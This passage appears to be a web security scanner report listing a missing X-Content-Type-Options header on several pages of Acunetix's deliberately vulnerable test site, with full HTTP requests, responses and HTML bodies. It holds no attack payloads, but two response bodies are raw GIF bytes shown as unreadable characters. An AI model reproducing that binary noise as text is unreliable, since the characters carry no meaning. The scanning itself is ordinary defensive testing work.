Response Body - size: 2,506 bytes.	GIF89a2&æÿÿÿf@æÜÏá ???Í¿¬³¡¿¿¿jEdâØÊàÕÇnJþþýmIïïïÀ°uRÚÎ¾¦vº©///___ÓÆµOOO\|[Æ·£ÏÏÏßßß m¯¯¯á oooå1:æ:Bã$ä$-êU[èMTímráä3øÊÌíæ/8ítzðâ!öÂÅüééâìdjò²´âçFMâêioòüâãûÞßç@GèCJæBIö×Øïé_eúæçó£§õ¼½ô¨¬â!ä(ã&áë`fòº½ùßáôÅÇùØÙñ £ïýïïýîïúììñ¦¨èHNñ±÷ÓÔö²µüäåäýïðïõÌÍòüïïõ°³üíîï}!ù,2&ÿ ¡¢£¤¥¦§¨©ª«¬ ³´µ¶·¸¹º»¼½¾¿À» ®ÅÆÇÈÉÊÈ°²ÁÏÐÑÒÓÐÃËØÙÚÛÜ¡ÍÔàáâãÂÄÝçèéêßäî¶¿ïÒÖëûüýÆíøÞpÏ×A«óÇ°á©ppÜÀ½ ¨LÃ ? @2Â6Á]ü¥1å/ÉªÑÑHi ÉTFåRÜJòY,K¢JEø)¥v4cÒ±¹¶cª[·Dÿ`e¨Wu(Ñ+Ë«¥^\jW¥xKxª%sûÕ½.ï__\|wù}\+00 kJ#ñ¾ÅûSÞY×äÑ,Âlbóf.<«½Nt. `Á·&XÐ ¨fù>ÜÖòZ+äd ÂÓ´>Ä`ü\$PDÁ ¿÷R]Ek×®áh$H jÄ$mPBå·_ èÇß'$%ø"$]I4I8Ø¡4@¡°ß©ØvT] \-pÝY\´À!Ø4À-4¢Áÿèè{£ÈßN 1Ê@Õ I¡`°A@-ÀV¢I(&I"`^"Y'izR×âI¨¸XFhðqLWÜIpÀpÜãÑ25z¢ÌCvÓ àè¡Þ8Ë5 PÞ£ã!êäzð½ð\|±b&&a}g~Røb©+ÔÉkÐoDa´À^0"!>H'wzbf¸é+:u´,j¥@0¨ßµëä¤Bò8wGªz§ ,jÁ³L'A½ñÂ(È«KÅjJ©@CÿAÁÄù(#ä_2@Øg~\É¸&K@+Ë¢mbæÈ´ùI.À¶Y+/b-Uu=L)ttpËÓ~Êc ¨×.ÔñÇ0-óB\Î5©`aCa&´0ÊmV("ü)J @1HÒÏe«sÌòÊOÈ~2£¤LnÏßþòV_n0çé0×d5Ùù69µ¥ªæ6ð~ §·ì«Üé¸`ÍyZòÛ\x3¤071@QX ()´ß£¸Ü·ñb7GÀôÔc(,òyBÉ"»R¹ê¸8:ÿ¼¹à;¨¾ær©Öðº^¾ 7Ýï¢R?û(:¦'.¸'5(LpÐ¬Kd^ò3æe/ÏÖ²t=» \¢ÀPÀâ½£;ïøLS¿ZX}K£¼&c¾Îé(i»J1´¡b0ùº@"xB¹A7@ 3%ðÊÅ AQD$(§HÅ 2æ$@Î^áA]ÐâÅqÑB1¢#¶Èû¾&ùPÉaÕnÁ¤×æ~¢XAa¤æF@ Ã#^ÉduB"evA¾yâCã°x2î`rëb.æÆYÌÿcWEIDQ¸0]úf1$ãAeT 2ÒðlªXÛ[ f@BaÐT(Å+&F¶ÀeÂzt$k"d/ÎàÖÐ8¶OlÁYÝi1ÑõHi©«ÚÇGJV²Î·@ªìx(â !P±Þ¶ùºLøfôdMíÎ¤Ì0é q0?Øc¨2]¥ @Ð\|¢À«>`YèS§BÔÍ¨´zAÀa `ØiPÓxPUÃZ:P/`êºðç'\|I#@ïÿÊ <AÕ·ÓpÖPvÅ<qà.!¢'"P²-C[l5:´ÉEKi^#Ê¡:ÅÕháä£T( µxqtCsg_H¥¤Â©6\|Àwì1 pýlx ?¦3½ÌêLðU]¾Å Ê0t%2o{@}[)E¢>Ë( lK$X¼ê6ÃÅV¿5÷¬`ßU`çDØWÙb ÞWgë9$ìc£ÅQ a¨Â´¦RU?Z BôTÞâQ ÀÄ µ§,ôdBAÉGj´vZÙÿrýô`A±h¥¨- P Lå `ô§ °:i Øq0Ð Äø³¸Þ¸÷ð-Åì;&$òuEd CQHñ@ý¤xc&c"xrNÄ £æ/îdÚûGQ\Á-&ØºhA6xî tÏÌçYp-½ßKÚ,%A*èA~SaÀ +ÐÁóLiU¹ÏJqØÂjá0râ²Ò Æó¥1í¢nv;Åá'êVdÔ¤N MaÌÕÐÕ¸.sJcëzØQ84«sMìÚì×ÈT'ÍìlÀ:ÙÐN ¡Mme<;ÚÈ¶Æ&¶Íín{ûÛ¨¸ÇMîrS";
URL	http://testaspnet.vulnweb.com/images/rss.gif
Method	GET
Parameter	X-Content-Type-Options
Attack
Evidence
Show / hide Request and Response
Request Header - size: 326 bytes.	GET http://testaspnet.vulnweb.com/images/rss.gif HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 247 bytes.	HTTP/1.1 200 OK Content-Type: image/gif Last-Modified: Thu, 29 May 2008 14:36:55 GMT Accept-Ranges: bytes ETag: "8e76327199c1c81:0" Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:15 GMT Content-Length: 134
Response Body - size: 134 bytes.	GIF89a¢ÿfÿÿÿÿÈ¤?}3ÿW!ù,K(ºÜþ@«½8ËÌ»Ý^T`Ö¢ßT±pP2PS¤]Ç{å'î6ü¹h:0YîvH[wd2U¯eN$Úr=xL.Ï;
URL	http://testaspnet.vulnweb.com/login.aspx
Method	GET
Parameter	X-Content-Type-Options
Attack
Evidence
Show / hide Request and Response
Request Header - size: 322 bytes.	GET http://testaspnet.vulnweb.com/login.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:15 GMT Content-Length: 13421
Response Body - size: 13,421 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>login</title> <meta name="vs_showGrid" content="True"> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="frmLogin" method="post" action="login.aspx" id="frmLogin"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTIyMzk2OTgxMQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQ9jYlBlcnNpc3RDb29raWVzwbv+Q8XadeewSqHhJbH9z4dvJw==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['frmLogin']; if (!theForm) { theForm = document.frmLogin; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="C2EE9ABB" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWwLoz/fGCgLStq24BwK3jsrkBALtuvfLDQKC3IeGDAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBG0lSndyVrygwyPPM/uCBtd+n7UP" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top" align="center"> <TABLE id="Table2" cellSpacing="0" cellPadding="5" border="0" align="center" class="FramedForm"> <TR> <TD>Username:</TD> <TD align="right"> <input name="tbUsername" type="text" id="tbUsername" class="Login" /></TD> </TR> <TR> <TD>Password:</TD> <TD align="right"> <input name="tbPassword" type="password" id="tbPassword" class="Login" /></TD> </TR> <TR> <TD align="left" colSpan="2"><input name="cbPersistCookie" type="checkbox" id="cbPersistCookie" checked="checked" class="classic" /> Remember me </TD> </TR> <TR> <TD></TD> <TD align="right"> <input type="submit" name="btnLogin" value="Login" id="btnLogin" /></TD> </TR> </TABLE> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?id=0
Method	GET
Parameter	X-Content-Type-Options
Attack
Evidence
Show / hide Request and Response
Request Header - size: 349 bytes.	GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=0 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=0 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:16 GMT Content-Length: 22839
Response Body - size: 22,839 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?id=0" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WAh8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fuc2QCBw8WAh8BBbMePHA+PHN0cm9uZz5Mb25kb24sIFVLPC9zdHJvbmc+ICZuZGFzaDsgPHN0cm9uZz5NYXkgMjAxOTwvc3Ryb25nPiAmbmRhc2g7IEFjdW5ldGl4LCB0aGUgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHNvZnR3YXJlLCBoYXMgYW5ub3VuY2VkIHRoYXQgYWxsIHZlcnNpb25zIG9mIHRoZSA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvPkFjdW5ldGl4IFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjwvYT4gbm93IHN1cHBvcnQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL25ldHdvcmstc2VjdXJpdHktc2Nhbm5lci8+bmV0d29yayBzZWN1cml0eSBzY2FubmluZzwvYT4uIE5ldHdvcmsgc2VjdXJpdHkgc2NhbnMgYXJlIHBvc3NpYmxlIHRoYW5rcyB0byB0aGUgc2VhbWxlc3MgaW50ZWdyYXRpb24gb2YgQWN1bmV0aXggd2l0aCB0aGUgcG93ZXJmdWwgT3BlblZBUyBzZWN1cml0eSBzb2x1dGlvbi4gVW50aWwgbm93LCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5uaW5nIGZ1bmN0aW9uYWxpdHkgd2FzIGF2YWlsYWJsZSBvbmx5IGluIEFjdW5ldGl4IE9ubGluZS48L3A+ICAgICA8cD4mbGRxdW87Tm8gbWF0dGVyIHRoZSBzaXplIG9mIHlvdXIgYnVzaW5lc3MsIHlvdSB1c2UgbXVsdGlwbGUgc2VjdXJpdHkgbWVhc3VyZXMgdG8gYWxsZXZpYXRlIGRpZmZlcmVudCB0eXBlcyBvZiByaXNrcy4gWW91ciBzZWN1cml0eSBzdHJhdGVneSBtdXN0IGFsd2F5cyBpbmNsdWRlIGJvdGggd2ViIHNlY3VyaXR5IHNjYW5zIGFuZCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5zLiBBbmQgaXQgbWFrZXMgaXQgc28gbXVjaCBlYXNpZXIgYW5kIG11Y2ggbW9yZSBlZmZpY2llbnQgaWYgeW91IGNhbiBkbyB0aGUgdHdvIHRvZ2V0aGVyIHVzaW5nIGEgc2luZ2xlIGludGVncmF0ZWQgdG9vbCwmcmRxdW87IHNhaWQgTmljb2xhcyBTY2liZXJyYXMsIENUTy48L3A+ICAgICA8cD5UaGVyZSBhcmUgbWFueSBhZHZhbnRhZ2VzIG9mIHJ1bm5pbmcgbmV0d29yayBzZWN1cml0eSBzY2FucyBpbiBBY3VuZXRpeC4gSGF2aW5nIGEgc2luZ2xlIGludGVncmF0ZWQgZGFzaGJvYXJkIHdpdGggYm90aCB3ZWIgYW5kIG5ldHdvcmsgdnVsbmVyYWJpbGl0aWVzIGdpdmVzIHRoZSBiZXN0IHBvc3NpYmxlIHJpc2sgdmlzaWJpbGl0eSBhbmQgc2F2ZXMgYSBsb3Qgb2YgdGltZSBhbmQgZWZmb3J0LiBOZXR3b3JrIHNjYW5zIG1heSBhbHNvIGJlbmVmaXQgZnJvbSBvdGhlciBBY3VuZXRpeCBmZWF0dXJlcywgc3VjaCBhcyA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvYWN1bmV0aXgtaW50ZWdyYXRpb25zLz5pc3N1ZSB0cmFja2VyIGludGVncmF0aW9uPC9hPiBhbmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL3Z1bG5lcmFiaWxpdHktbWFuYWdlbWVudC1yZWd1bGF0b3J5LWNvbXBsaWFuY2UvPmNvbXByZWhlbnNpdmUgcmVwb3J0aW5nPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPk1vcmUgRmVhdHVyZXMgaW4gdGhlIExhdGVzdCBCdWlsZDwvc3Ryb25nPjwvcD4gICAgIDxwPk9wZW5WQVMgaW50ZWdyYXRpb24gaXMgaW50cm9kdWNlZCBhcyBwYXJ0IG9mIHRoZSBsYXRlc3QgQWN1bmV0aXggdmVyc2lvbiAxMiBidWlsZCAoPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmJ1aWxkIDEyLjAuMTkwNTE1MTQ5PC9hPikuIFRoaXMgbmV3IGJ1aWxkIGFsc28gaW5jbHVkZXM6PC9wPiAgICAgPHA+LSBTdXBwb3J0IGZvciBJUHY2PGJyIC8+ICAgICAtIEltcHJvdmVkIHVzYWdlIG9mIG1hY2hpbmUgcmVzb3VyY2VzPGJyIC8+ICAgICAtIEFkZGVkIHN1cHBvcnQgZm9yIFNlbGVuaXVtIHNjcmlwdHMgYXMgaW1wb3J0IGZpbGVzPGJyIC8+ICAgICAtIE11bHRpcGxlIHZ1bG5lcmFiaWxpdHkgY2hlY2tzIGZvciBTQVA8YnIgLz4gICAgIC0gVW5hdXRob3JpemVkIGFjY2VzcyBkZXRlY3Rpb24gZm9yIFJlZGlzIGFuZCBNZW1jYWNoZWQ8YnIgLz4gICAgIC0gU291cmNlIGNvZGUgZGlzY2xvc3VyZSBmb3IgUnVieSBhbmQgUHl0aG9uPC9wPiAgICAgPHA+VGhlIG5ldyBidWlsZCBhbHNvIGluY2x1ZGVzIGEgbnVtYmVyIG9mIHVwZGF0ZXMgYW5kIGZpeGVzLCBhbGwgb2Ygd2hpY2ggYXJlIGF2YWlsYWJsZSBmb3IgYm90aCBXaW5kb3dzIGFuZCBMaW51eC4gTW9yZSBpbmZvcm1hdGlvbiBjYW4gYmUgZm91bmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmhlcmU8L2E+LjwvcD4gICAgIDxwPkdldCBhIGRlbW8gb2YgdGhlIHByb2R1Y3QgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vbmV0d29yay1zZWN1cml0eS1zY2FubmVyLz5oZXJlPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD4gICAgIDxwPjxzdHJvbmc+QWN1bmV0aXgsIHRoZSBDb21wYW55PC9zdHJvbmc+PC9wPiAgICAgPHA+Rm91bmRlZCBpbiAyMDA0IHRvIGNvbWJhdCB0aGUgYWxhcm1pbmcgcmlzZSBpbiB3ZWIgYXBwbGljYXRpb24gYXR0YWNrcywgQWN1bmV0aXggaXMgdGhlIG1hcmtldCBsZWFkZXIgYW5kIGEgcGlvbmVlc